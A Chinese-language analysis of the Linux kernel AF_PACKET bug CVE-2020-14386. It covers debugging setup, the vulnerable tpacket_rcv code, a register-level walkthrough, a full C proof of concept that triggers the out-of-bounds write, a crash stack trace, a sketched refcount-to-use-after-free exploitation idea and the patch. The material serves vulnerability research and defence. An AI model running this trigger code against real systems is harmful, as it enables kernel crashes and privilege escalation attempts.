环境搭建
(1)下载调试镜像:
sudo apt-get install debootstrap
wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh
chmod +x create-image.sh
./create-image.sh
(2)编译内核
(3)编译poc
wget https://raw.githubusercontent.com/cgwalters/cve-2020-14386/master/cve-cap-net-raw.c
gcc cve-cap-net-raw.c -o poc -static(4)赋予poc CAP_NET_RAW 权限,CAP_NET_RAW权限,可以通过网络命名空间来实现,编译内核时需要开启CONFIG_USER_NS=y
# 设置 cap_net_raw 权限
setcap cap_net_raw+ep ./poc
# 查看程序的 cap 权限
getcap ./poc
# 删除 cap_net_raw 权限
setcap cap_net_raw-ep ./poc
仅做调试使用可以直接运行:
sudo ./poc skip-unshare
(5)传入qemu镜像中就可以调试
设置断点:
b tpacket_rcv基础知识
linux 内核的内存布局
0xffffffffffffffff ---+-----------+-----------------------------------------------+-------------+
| | |+++++++++++++|
8M | | unused hole |+++++++++++++|
| | |+++++++++++++|
0xffffffffff7ff000 ---|-----------+------------| FIXADDR_TOP |--------------------|+++++++++++++|
1M | | |+++++++++++++|
0xffffffffff600000 ---+-----------+------------| VSYSCALL_ADDR |------------------|+++++++++++++|
548K | | vsyscalls |+++++++++++++|
0xffffffffff577000 ---+-----------+------------| FIXADDR_START |------------------|+++++++++++++|
5M | | hole |+++++++++++++|
0xffffffffff000000 ---+-----------+------------| MODULES_END |--------------------|+++++++++++++|
| | |+++++++++++++|
1520M | | module mapping space (MODULES_LEN) |+++++++++++++|
| | |+++++++++++++|
0xffffffffa0000000 ---+-----------+------------| MODULES_VADDR |------------------|+++++++++++++|
| | |+++++++++++++|
512M | | kernel text mapping, from phys 0 |+++++++++++++|
| | |+++++++++++++|
0xffffffff80000000 ---+-----------+------------| __START_KERNEL_map |-------------|+++++++++++++|
2G | | hole |+++++++++++++|
0xffffffff00000000 ---+-----------+-----------------------------------------------|+++++++++++++|
64G | | EFI region mapping space |+++++++++++++|
0xffffffef00000000 ---+-----------+-----------------------------------------------|+++++++++++++|
444G | | hole |+++++++++++++|
0xffffff8000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
16T | | %esp fixup stacks |+++++++++++++|
0xffffff0000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
3T | | hole |+++++++++++++|
0xfffffc0000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
16T | | kasan shadow memory (16TB) |+++++++++++++|
0xffffec0000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
1T | | hole |+++++++++++++|
0xffffeb0000000000 ---+-----------+-----------------------------------------------| kernel space|
1T | | virtual memory map for all of struct pages |+++++++++++++|
0xffffea0000000000 ---+-----------+------------| VMEMMAP_START |------------------|+++++++++++++|
1T | | hole |+++++++++++++|
0xffffe90000000000 ---+-----------+------------| VMALLOC_END |------------------|+++++++++++++|
32T | | vmalloc/ioremap (1 << VMALLOC_SIZE_TB) |+++++++++++++|
0xffffc90000000000 ---+-----------+------------| VMALLOC_START |------------------|+++++++++++++|
1T | | hole |+++++++++++++|
0xffffc80000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
64T | | direct mapping of all phys. memory |+++++++++++++|
| | (1 << MAX_PHYSMEM_BITS) |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
0xffff880000000000 ----+-----------+-----------| __PAGE_OFFSET_BASE | -------------|+++++++++++++|
| | |+++++++++++++|
8T | | guard hole, reserved for hypervisor |+++++++++++++|
| | |+++++++++++++|
0xffff800000000000 ----+-----------+-----------------------------------------------+-------------+
|-----------| |-------------|
|-----------| hole caused by [48:63] sign extension |-------------|
|-----------| |-------------|
0x0000800000000000 ----+-----------+-----------------------------------------------+-------------+
PAGE_SIZE | | guard page |xxxxxxxxxxxxx|
0x00007ffffffff000 ----+-----------+--------------| TASK_SIZE_MAX | ---------------|xxxxxxxxxxxxx|
| | | user space |
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
128T | | different per mm |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
0x0000000000000000 ----+-----------+-----------------------------------------------+-------------+
PACKET_MMAP
类型为SOCK_DGRAM/SOCK_RAW的PF_PACKET套接口,除了普通的在内核与用户层间拷贝数据包的方式外,还可通过setsockopt系统调用设置环形接收buffer,通过mmap与应用层共享这部分内存。如果通过setsockopt系统调用使能了PACKET_VNET_HDR选项,还有一个virtio_net_hdr结构,如下数据帧空间buffer中一个数据包相关的所有信息块如下:
目前TPACKET_HEADER有三个版本,每个版本的长度略有不同,用户层可使用setsockopt(PACKET_VERSION)设置需要的版本,另外也可通过getsockopt(PACKET_HDRLEN)获取到每个版本对应的头部长度,设置环形接收buffer需要此长度值。
enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3
};
对于版本1和2,不论接收还是发送的环形buffer,需要配置4个参数:分别为内存块的大小和数量、每个数据包的大小和数据包总数
struct tpacket_req {
unsigned int tp_block_size; /* Minimal size of contiguous block */
unsigned int tp_block_nr; /* Number of blocks */
unsigned int tp_frame_size; /* Size of frame */
unsigned int tp_frame_nr; /* Total number of frames */
};
上述结构定义在:/usr/include/linux/if_packet.h,构建了一个环形buffer,一个环形buffer就是一块存放数据包的内存区域。每个数据包会存放在一个单独的帧(frame)中,多个帧会被分组形成内存块(block)。每个block有 frames_per_block = tp_block_size / tp_frame_size 个frame,tp_block_nr表示block的总数,tp_frame_nr表示frame总数 。
例如:
tp_block_size= 4096
tp_frame_size= 2048
tp_block_nr = 4
tp_frame_nr = 8
得到的缓冲区结构如下图所示:
block #1 block #2
+---------+---------+ +---------+---------+
| frame 1 | frame 2 | | frame 3 | frame 4 |
+---------+---------+ +---------+---------+
block #3 block #4
+---------+---------+ +---------+---------+
| frame 5 | frame 6 | | frame 7 | frame 8 |
+---------+---------+ +---------+---------+
block 是由 pg_vec kmalloc进行动态分配的vector,block之间并不会紧邻:
static char *alloc_one_pg_vec_page(unsigned long order)
{
buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;
}
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
}
}
ring buffer是用于数据包处理的缓冲区,rx_ring 是接收数据的缓冲区,tx_ring是传输数据的缓冲区,分别可以通过setsockopt的PACKET_RX_RING和PACKET_TX_RING参数进行设置,packet_ring_buffer定义如下:
struct packet_ring_buffer {
struct pgv *pg_vec;
struct tpacket_kbdq_core prb_bdqc;
}
struct pgv {
char *buffer;
}
其中pg_vec字段为指向pgv结构体数组的一个指针,数组中的每个元素都保存了对某个内存块的引用。每个内存块实际上都是单独分配的,没有位于一个连续的内存区域中:
漏洞分析
packet_set_ring->tpacket_rcv:
漏洞代码:
static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
struct packet_type *pt, struct net_device *orig_dev)
{
// ...
if (sk->sk_type == SOCK_DGRAM) {
macoff = netoff = TPACKET_ALIGN(po->tp_hdrlen) + 16 +
po->tp_reserve;
} else {
unsigned int maclen = skb_network_offset(skb);
// tp_reserve is unsigned int, netoff is unsigned short. Addition can overflow netoff
netoff = TPACKET_ALIGN(po->tp_hdrlen +
(maclen < 16 ? 16 : maclen)) +
po->tp_reserve; // [1]
if (po->has_vnet_hdr) {
netoff += sizeof(struct virtio_net_hdr);
do_vnet = true;
}
// Attacker controls netoff and can make macoff be smaller than sizeof(struct virtio_net_hdr)
macoff = netoff - maclen; // [2]
}
// ...
// "macoff - sizeof(struct virtio_net_hdr)" can be negative, resulting in a pointer before h.raw
if (do_vnet &&
virtio_net_hdr_from_skb(skb, h.raw + macoff -
sizeof(struct virtio_net_hdr),
vio_le(), true, 0)) { // [3]
// ...
漏洞在于[1]处,netoff是 unsigned short 类型,范围为[0, 0xffff],而tp_reserve为unsigned int 类型,范围为[0, 0xffffffff],在赋值过程进行类型转化,导致高两个字节截断。所以[2]处控制netoff,使得到的macoff小于sizeof(struct virtio_net_hdr),[3]处macoff - sizeof(struct virtio_net_hdr) 为负,相当于往&h.raw 地址前面写入数据,造成向上越界写漏洞。
调试过程:
[1]处为下图中红框的执行代码:po->tp_reserve存放在$rbp+0x4e4处,赋给 esi寄存器,值为0xffb4,得到的maclen为0xe,保存在edx寄存器中,经过(maclen < 16 ? 16 : maclen) 比较值变成0x10,eax寄存器保存po->tp_hdrlen的值,为0x43,所以最后经过处理po->tp_hdrlen + (maclen < 16 ? 16 : maclen)) 的值为 (0x10+0x43)&0xfffffff0=0x50,加上po->tp_reserve的值0xfffb4,得到0xfffb4+0x50=0x10004,但因为netoff是unsigned short类型,所以通过ax寄存器传递,造成了截断,此时netoff=0x4。
进入[2] 处前会进入一个判断:
if (po->has_vnet_hdr) {
netoff += sizeof(struct virtio_net_hdr);
do_vnet = true;
}virtio_net_hdr结构大小为0xa,所以netoff变成0x4+0xa=0xe。
进入[2]处:
macoff = netoff - maclen;macoff = 0xe - 0xe =0x0。
进入[3]处:
if (do_vnet &&
virtio_net_hdr_from_skb(skb, h.raw + macoff -
sizeof(struct virtio_net_hdr),
vio_le(), true, 0)) {
virtio_net_hdr_from_skb 函数实现如下:
static inline int virtio_net_hdr_from_skb(const struct sk_buff *skb,
struct virtio_net_hdr *hdr,
bool little_endian,
bool has_data_valid,
int vlan_hlen)
{
memset(hdr, 0, sizeof(*hdr)); /* no info leak */
if (skb_is_gso(skb)) {
struct skb_shared_info *sinfo = skb_shinfo(skb);
/* This is a hint as to how much should be linear. */
hdr->hdr_len = __cpu_to_virtio16(little_endian,
skb_headlen(skb));
hdr->gso_size = __cpu_to_virtio16(little_endian,
sinfo->gso_size);
if (sinfo->gso_type & SKB_GSO_TCPV4)
hdr->gso_type = VIRTIO_NET_HDR_GSO_TCPV4;
else if (sinfo->gso_type & SKB_GSO_TCPV6)
hdr->gso_type = VIRTIO_NET_HDR_GSO_TCPV6;
else
return -EINVAL;
if (sinfo->gso_type & SKB_GSO_TCP_ECN)
hdr->gso_type |= VIRTIO_NET_HDR_GSO_ECN;
} else
hdr->gso_type = VIRTIO_NET_HDR_GSO_NONE;
if (skb->ip_summed == CHECKSUM_PARTIAL) {
hdr->flags = VIRTIO_NET_HDR_F_NEEDS_CSUM;
hdr->csum_start = __cpu_to_virtio16(little_endian,
skb_checksum_start_offset(skb) + vlan_hlen);
hdr->csum_offset = __cpu_to_virtio16(little_endian,
skb->csum_offset);
} else if (has_data_valid &&
skb->ip_summed == CHECKSUM_UNNECESSARY) {
hdr->flags = VIRTIO_NET_HDR_F_DATA_VALID;
} /* else everything is zero */
return 0;
}
h.raw地址为0xffffc90000429000,保存在%r10寄存器,macoff经过之前的计算,值为0x0,保存在%rdx寄存器中,virtio_net_hdr结构体大小为0xa,所以经过计算传入的参数hdr = h.raw + macoff - sizeof(struct virtio_net_hdr) = (0xffffc90000429000 + 0*1)- 0xa = 0xffffc90000428ff6,因为0xffffc90000428ff6地址未被映射,无法访问,而进入virtio_net_hdr_from_skb函数后对hdr地址有个初始化操作,所以由于访问错误 do_page_fault 造成crash。
漏洞限制:
该漏洞需要程序拥有CAP_NET_RAW权限,并且只能向上越界写1~10个字节。因为越界写处: virtio_net_hdr_from_skb(skb, h.raw + macoff - sizeof(struct virtio_net_hdr), vio_le(), true, 0),要往h.raw 之前的地址写,需要加上一个负数,而macoff为unsigned short类型,最小值为0,所以最多减去一个virtio_net_hdr结构大小(为0xa个字节大小)。
Poc代码:
/* Taken from https://www.openwall.com/lists/oss-security/2020/09/03/3 */
#define _GNU_SOURCE
#include <sched.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdbool.h>
#include <stdarg.h>
#include <net/if.h>
#include <stdint.h>
#define KMALLOC_PAD 512
#define PAGEALLOC_PAD 1024
void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr) {
int v = TPACKET_V2;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0) {
perror("[-] setsockopt(PACKET_VERSION)");
exit(EXIT_FAILURE);
}
v = 1;
rv = setsockopt(s, SOL_PACKET, PACKET_VNET_HDR, &v, sizeof(v));
if (rv < 0)
{
perror("setsockopt(PACKET_VNET_HDR)\n");
return 1;
}
v = 0xffff - 20 - 0x30 -7; //0xffb4
rv = setsockopt(s, SOL_PACKET, PACKET_RESERVE, &v, sizeof(v));
if (rv < 0)
{
perror("setsockopt(PACKET_RESERVE)\n");
return 1;
}
struct tpacket_req req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size;
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (rv < 0) {
perror("[-] setsockopt(PACKET_RX_RING)");
exit(EXIT_FAILURE);
}
}
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
unsigned int block_nr) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) {
perror("[-] socket(AF_PACKET)");
exit(EXIT_FAILURE);
}
packet_socket_rx_ring_init(s, block_size, frame_size, block_nr);
struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;
int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0) {
perror("[-] bind(AF_PACKET)");
exit(EXIT_FAILURE);
}
return s;
}
// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
int packet_sock_kmalloc() {
int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
if (s == -1) {
perror("[-] socket(SOCK_DGRAM)");
exit(EXIT_FAILURE);
}
return s;
}
void kmalloc_pad(int count) {
int i;
for (i = 0; i < count; i++)
packet_sock_kmalloc();
}
void pagealloc_pad(int count) {
packet_socket_setup(0x8000, 2048, count);
}
bool write_file(const char* file, const char* what, ...) {
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
close(fd);
return false;
}
close(fd);
return true;
}
void setup_unshare() {
int real_uid = getuid();
int real_gid = getgid();
if (unshare(CLONE_NEWUSER) != 0) {
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (unshare(CLONE_NEWNET) != 0) {
perror("[-] unshare(CLONE_NEWNET)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/setgroups", "deny")) {
perror("[-] write_file(/proc/self/set_groups)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
perror("[-] write_file(/proc/self/uid_map)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
perror("[-] write_file(/proc/self/gid_map)");
exit(EXIT_FAILURE);
}
}
void prep() {
cpu_set_t my_set;
CPU_ZERO(&my_set);
CPU_SET(0, &my_set);
if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
perror("[-] sched_setaffinity()");
exit(EXIT_FAILURE);
}
}
void packet_socket_send(int s, char *buffer, int size) {
struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_halen = ETH_ALEN;
if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,
sizeof(sa)) < 0) {
perror("[-] sendto(SOCK_RAW)");
exit(EXIT_FAILURE);
}
}
void loopback_send(char *buffer, int size) {
int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (s == -1) {
perror("[-] socket(SOCK_RAW)");
exit(EXIT_FAILURE);
}
packet_socket_send(s, buffer, size);
}
int main(int argc, char **argv)
{
int skip_unshare = 0;
struct stat stbuf;
if (argc > 1 && strcmp (argv[1], "skip-unshare") == 0)
skip_unshare = 1;
else if (stat ("/run/secrets/kubernetes.io", &stbuf) == 0)
skip_unshare = 1;
if (!skip_unshare)
setup_unshare();
prep();
packet_socket_setup(0x800000, 0x11000, 2);
uint32_t size = 0x80000/8;
char* buf = malloc(size);
if(!buf)
{
perror("malloc\n");
exit(EXIT_FAILURE);
}
memset(buf,0xce,size);
loopback_send(buf,size);
return 0;
}
栈回溯:
#0 memset_erms () at arch/x86/lib/memset_64.S:66
#1 0xffffffff831934a6 in virtio_net_hdr_from_skb
(little_endian=<optimized out>, has_data_valid=<optimized out>,
vlan_hlen=<optimized out>, hdr=<optimized out>, skb=<optimized
out>) at ./include/linux/virtio_net.h:134
#2 tpacket_rcv (skb=0xffff8881ef539940, dev=0xffff8881de534000,
pt=<optimized out>, orig_dev=<optimized out>)
at net/packet/af_packet.c:2287
#3 0xffffffff82c52e47 in dev_queue_xmit_nit (skb=0xffff8881ef5391c0,
dev=<optimized out>) at net/core/dev.c:2276
#4 0xffffffff82c5e3d4 in xmit_one (more=<optimized out>,
txq=<optimized out>, dev=<optimized out>,
skb=<optimized out>) at net/core/dev.c:3473
#5 dev_hard_start_xmit (first=0xffffc900001c0ff6, dev=0x0
<fixed_percpu_data>, txq=0xa <fixed_percpu_data+10>,
ret=<optimized out>) at net/core/dev.c:3493
#6 0xffffffff82c5fc7e in __dev_queue_xmit (skb=0xffff8881ef5391c0,
sb_dev=<optimized out>) at net/core/dev.c:4052
#7 0xffffffff831982d3 in packet_snd (len=65536, msg=<optimized out>,
sock=<optimized out>) 0001-net-packet-fix-overflow-in-tpacket_rcv
at net/packet/af_packet.c:2979
#8 packet_sendmsg (sock=<optimized out>, msg=<optimized out>,
len=65536) at net/packet/af_packet.c:3004
#9 0xffffffff82be09ed in sock_sendmsg_nosec (msg=<optimized out>,
sock=<optimized out>) at net/socket.c:652
#10 sock_sendmsg (sock=0xffff8881e8ff56c0, msg=0xffff8881de56fd88) at
net/socket.c:672
漏洞利用
该漏洞和 CVE-2017-7308 Linux Kernel packet_set_ring 整数符号错误漏洞类似,不过CVE-2017-7308是向后溢出。
利用尝试:
想要参考 CVE-2017-7308 布置堆的布局进行利用,但是packet_set_ring函数中进行了检查,为了触发漏洞,我们构造的po->tp_reserve 为0xffb4,这就造成下面【1】处最小frame的大小min_frame_size 为0xffe8,所以block的大小至少要为0x10000,这样就不能控制填充什么结构在block旁边。(这样大小的堆块不知道是通过什么vmalloc-xxx分配得到,vmalloc-xxx可以对应什么结构不清楚?)
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
……
if (req->tp_block_nr) {
unsigned int min_frame_size;
/* Sanity tests and some calculations */
err = -EBUSY;
if (unlikely(rb->pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}
err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve; // <------------【1】计算min_frame_size
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size)) // <-----------【2】 frame的size不能小于min_frame_size
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;
rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0)) // <----------------【3】 block 不能小于frame
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;
//分配环形缓冲区的内存块空间:
err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);
packet_sock对象通过slab分配器使用kmalloc()函数进行分配。slab分配器主要用于分配比单内存页还小的那些对象
h.raw 的获得:
tpacket_rcv:
-> h.raw = packet_current_rx_frame(po, skb,TP_STATUS_KERNEL, (macoff+snaplen));
->case TPACKET_V2:
curr = packet_lookup_frame(po, &po->rx_ring, po->rx_ring.head, status);
static void *packet_lookup_frame(struct packet_sock *po,
struct packet_ring_buffer *rb,
unsigned int position,
int status)
{
unsigned int pg_vec_pos, frame_offset;
union tpacket_uhdr h;
pg_vec_pos = position / rb->frames_per_block;
frame_offset = position % rb->frames_per_block;
h.raw = rb->pg_vec[pg_vec_pos].buffer +
(frame_offset * rb->frame_size);
if (status != __packet_get_status(po, h.raw))
return NULL;
return h.raw;
}
该漏洞只能向前越界写1~10个字节,并且block只能分配大于0x10000,目前来看利用是很难的
作者利用思路:
struct sctp_shared_key {
struct list_head key_list;
struct sctp_auth_bytes *key;
refcount_t refcnt;
__u16 key_id;
__u8 deactivated;
};
作者提供的漏洞利用思路是在ring buffer前放置一个包含refcount的结构,上溢减小refcount的值,因为packet_socket_send中的memset会赋零。refcount减少,该对象会被认为被释放了,转化成UAF漏洞。
目前找到的是sctp_shared_key这个结构,占32个字节大小,通过kmalloc-32分配,因为一页的大小为4k,4k%32=0,而ring buffer分配是页对齐的,所以将sctp_shared_key 分配在页的最后。
由于结构对齐的缘故,key_id和deactivated字段各占4个字节,所以利用漏洞最多上溢refcnt 1~2个字节
另外笔者认为作者说溢出refcnt最高位两个字节是不是搞错了,还是说大端存放?那么图片中应该是refcount=10001b就说的通了。
总结:
本篇文章分析了CVE-2020-14386:Linux内核AF_PACKET权限提升漏洞的成因,对作者的漏洞利用思路进行了解读,但未实现漏洞利用,希望抛砖引玉,有大佬能实现漏洞利用,或者分享一下思路。
补丁分析
补丁将netoff 类型设置成unsigned int,赋值左右两边类型相同,不会造成整数溢出。并且检查了netoff要小于USHRT_MAX。
参考链接
https://gvisor.dev/blog/2020/09/18/containing-a-real-vulnerability/
https://www.openwall.com/lists/oss-security/2020/09/03/3
https://cert.360.cn/warning/detail?id=e73761f3747ae3b13b61b7f25a9a8e8a
https://mp.weixin.qq.com/s/uv3BiznUCUy8do_ullnXUw
https://blog.csdn.net/sinat_20184565/article/details/82788387
https://www.anquanke.com/post/id/86139
https://xz.aliyun.com/t/3455#toc-4
https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
https://github.com/bcoles/kernel-exploits/blob/master/CVE-2017-7308/poc.c
docker:https://github.com/cgwalters/cve-2020-14386
作者的漏洞分析:https://unit42.paloaltonetworks.com/cve-2020-14386/
补丁:
packet_mmap:https://elixir.bootlin.com/linux/v5.6/source/Documentation/networking/packet_mmap.txt
